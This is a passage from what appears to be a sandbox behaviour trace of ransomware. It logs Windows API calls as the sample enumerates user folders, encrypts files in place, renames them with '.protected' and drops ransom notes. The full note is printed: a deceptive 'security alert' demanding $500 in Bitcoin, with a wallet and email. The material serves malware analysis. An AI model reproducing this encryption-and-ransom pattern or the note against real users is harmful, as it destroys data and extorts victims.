"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.710] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.710] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0084.710] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0084.710] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0084.710] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0084.710] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0084.710] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 90 [0084.710] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0084.710] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0084.710] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.710] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.711] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 90 [0084.711] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0084.711] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 90 [0084.711] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0084.711] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 90 [0084.711] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0084.711] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.712] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.712] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.712] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.712] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.713] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.713] CloseHandle (hObject=0x150) returned 1 [0084.713] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.protected") returned 100 [0084.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.protected")) returned 1 [0084.725] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.725] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0084.725] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0084.725] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0084.725] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0084.725] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0084.725] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 88 [0084.725] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0084.725] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0084.725] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.725] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.726] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 88 [0084.726] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0084.726] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 88 [0084.726] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0084.726] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 88 [0084.726] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0084.726] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.726] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.726] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.727] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.727] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.728] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.728] CloseHandle (hObject=0x150) returned 1 [0084.728] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].protected") returned 98 [0084.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1].protected")) returned 1 [0084.729] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.729] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="Windows") returned -1 [0084.729] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="Program Files") returned -1 [0084.729] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="Program Files (x86)") returned -1 [0084.729] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="$Recycle.bin") returned 1 [0084.729] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="System Volume Information") returned -1 [0084.729] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\ieonline.microsoft[1]") returned 100 [0084.729] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.729] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.729] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\RESTORE_FILES.txt") returned 96 [0084.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.730] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.730] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.731] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.731] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.731] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.731] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.731] CloseHandle (hObject=0x14c) returned 1 [0084.732] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.732] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.732] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\RESTORE_FILES.txt") returned 87 [0084.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.732] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.732] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.733] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.733] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.733] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.733] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.733] CloseHandle (hObject=0xd8) returned 1 [0084.734] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.734] lstrcmpiW (lpString1="FORMS", lpString2="Windows") returned -1 [0084.734] lstrcmpiW (lpString1="FORMS", lpString2="Program Files") returned -1 [0084.734] lstrcmpiW (lpString1="FORMS", lpString2="Program Files (x86)") returned -1 [0084.734] lstrcmpiW (lpString1="FORMS", lpString2="$Recycle.bin") returned 1 [0084.734] lstrcmpiW (lpString1="FORMS", lpString2="System Volume Information") returned -1 [0084.734] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS") returned 63 [0084.734] lstrcmpW (lpString1="FORMS", lpString2=".") returned 1 [0084.734] lstrcmpW (lpString1="FORMS", lpString2="..") returned 1 [0084.734] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\*") returned 65 [0084.734] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.734] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.734] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.734] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.734] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.734] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.734] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\.") returned 65 [0084.734] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.734] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.735] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.735] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.735] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.735] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.735] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.735] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\..") returned 66 [0084.735] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.735] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.735] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.735] lstrcmpiW (lpString1="FRMCACHE.DAT", lpString2="Windows") returned -1 [0084.735] lstrcmpiW (lpString1="FRMCACHE.DAT", lpString2="Program Files") returned -1 [0084.735] lstrcmpiW (lpString1="FRMCACHE.DAT", lpString2="Program Files (x86)") returned -1 [0084.735] lstrcmpiW (lpString1="FRMCACHE.DAT", lpString2="$Recycle.bin") returned 1 [0084.735] lstrcmpiW (lpString1="FRMCACHE.DAT", lpString2="System Volume Information") returned -1 [0084.735] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT") returned 76 [0084.735] StrStrIW (lpFirst="FRMCACHE.DAT", lpSrch=".protected") returned 0x0 [0084.735] lstrcmpW (lpString1="FRMCACHE.DAT", lpString2="RESTORE_FILES.txt") returned -1 [0084.735] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.735] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT") returned 76 [0084.735] StrStrW (lpFirst="FRMCACHE.DAT", lpSrch=".txt") returned 0x0 [0084.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT") returned 76 [0084.735] StrStrW (lpFirst="FRMCACHE.DAT", lpSrch=".rar") returned 0x0 [0084.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT") returned 76 [0084.736] StrStrW (lpFirst="FRMCACHE.DAT", lpSrch=".zip") returned 0x0 [0084.736] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.751] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.751] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.752] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.752] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.753] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.753] CloseHandle (hObject=0x14c) returned 1 [0084.753] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT.protected") returned 86 [0084.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat.protected")) returned 1 [0084.754] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.754] FindClose 